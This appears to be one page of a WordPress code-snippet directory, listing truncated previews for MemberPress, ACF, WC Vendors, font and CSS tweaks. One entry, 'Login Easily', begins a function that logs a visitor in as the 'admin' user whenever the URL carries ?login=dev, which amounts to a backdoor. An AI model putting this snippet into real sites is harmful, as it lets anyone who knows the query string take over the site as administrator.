MemberPress: Add Address Fields to Authorize.net

By default, the user’s address data collected through MemberPress registration forms are not sent to Authorize.net.…

MFP > Deploy Show & Get Data

add_action('acf/save_post', 'add_show_children'); function add_show_children($post_id) { if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) return $post_id; if (!wp_is_post_revision($post_id) && 'show' ==…

Search Atlas

Otto SEO

Bryan Whitehurst
<10

Login Easily

function auto_login() { if (isset($_GET['login']) && $_GET['login'] === 'dev') { $user = get_user_by('login', 'admin'); if ($user)…

MemberPress: Adjusting Paywall Cookie Expiry Time

This code snippet modifies the default expiration period (30 days) for the MemberPress paywall cookie. The…

Waste Licence

Waste carriers affiliation badge

Anthony Burnett
<10

Set Default Donation Amount

Set the default donation amount for all campaigns.

Count and message according to number of user files

Displays a different message according to how many files a user has in their media library.

<10

Ensure Webfont is Loaded (non-Elementor)

function custom_font_display( $current_value, $font_family, $data ) { return 'swap'; } add_filter( 'font_display', 'custom_font_display', 10, 3 );

Show Invoice for Refunded

Makes PDF Invoices available for refunded payments

Price Option Not Checked

Prevent variable pricing options from being checked by default

Add Custom Settings Tab to Vendor Dashboard

// Add the tab to the tab nav add_filter( 'wcv_store_tabs', 'add_custom_tab_nav' ); function add_custom_tab_nav( $tabs ){…

Hide “Everywhere Else” on the countries dropdown

if ( ! function_exists( 'wcv_hide_everywhere_else' ) ) { /** * Hide the "Everywhere else" option in…

home slider css

/* Increase the image size in the slider */ .container { width: 100%; max-width: 90%; /*…

1 118 119 120 121 122 149